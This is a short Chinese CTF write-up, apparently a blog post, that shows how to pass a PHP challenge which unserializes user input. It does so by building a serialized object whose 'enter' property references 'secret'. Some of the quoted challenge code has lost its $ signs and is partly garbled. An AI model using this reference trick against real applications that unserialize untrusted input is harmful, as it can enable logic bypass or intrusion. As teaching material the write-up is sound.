PHP“引用”漏洞

今日例题:

<?php

highlight_file(FILE);

error_reporting(0);

include("flag.php");

class just4fun {

var $enter;

var $secret;

}

if (isset($_GET['pass'])) {

pass = _GET['pass'];

pass=str_replace('\*','\\\*',pass);

}

o = unserialize(pass);

if ($o) {

$o->secret = "*";

if (o-\>secret === o->enter)

echo "Congratulation! Here is my secret: ".$flag;

else

echo "Oh no... You can't fool me";

}

else echo "are you trolling?";

?>

这道题目其实很容易,其实就构造序列化字符串使enter=secret,但是secret已经写死了,变成*,我貌似只能给enter赋值*才能满足条件,但是 pass=str_replace('\*','\\\*',pass);这里我只要写入*就会被替换成\,所以现在问题变成了怎么在不写入*的情况下让enter=secret,这时就要使用引用漏洞。

引用漏洞:相当于创建了一个快捷方式,可以让你去访问,但是我又不是直接去对原对象赋值。

&$a->secret这里就是一个引用,在前面加个&符号就好

据陈腾师傅所说,所以这道题目的关键根本不在于他们是否都是*,而是在于他们相等,只要加个&就好了

代码如下:

复制代码
<?php


class just4fun{
    var $enter='*';
    var $secret;
}
$a= new just4fun();
$a->enter=&$a->secret;
echo serialize($a);

​

希望本文能够帮助大家。

相关推荐
杰_happy1 小时前
PHP Swoft2 框架精华系列:Annotation 注解机制详解
php·swoft
kali-Myon1 小时前
攻防世界[level7]-Web_php_wrong_nginx_config
前端·nginx·安全·php·web·ctf·攻防世界
百度安全2 小时前
BCS 2025|百度大模型安全解决方案入选中国网络安全优秀案例
安全·web安全·百度
鹿鸣天涯2 小时前
网络安全攻防演习安全保障解决方案
网络·安全·web安全
Q_Q5110082852 小时前
python题库及试卷管理系统
开发语言·spring boot·python·django·flask·node.js·php
(:满天星:)2 小时前
使用 Kubernetes 部署 PHP 留言板应用(含 Redis 架构)
redis·kubernetes·php
浮江雾3 小时前
SSRF4 SSRF-gopher 协议扩展利用-向内网发起 GET/POST 请求
安全·web安全·网络安全·get·post·ssrf·gopher
galaxylove1 天前
Gartner发布新的网络安全运营模型:决定安全运营的9个组件
网络·安全·web安全
神仙别闹1 天前
基于 Matlab 和 Truetime 的网络控制系统仿真
网络·matlab·php
Joomla中文网1 天前
在2023年ChatGPT如何谈joomla和wordpress
php·joomla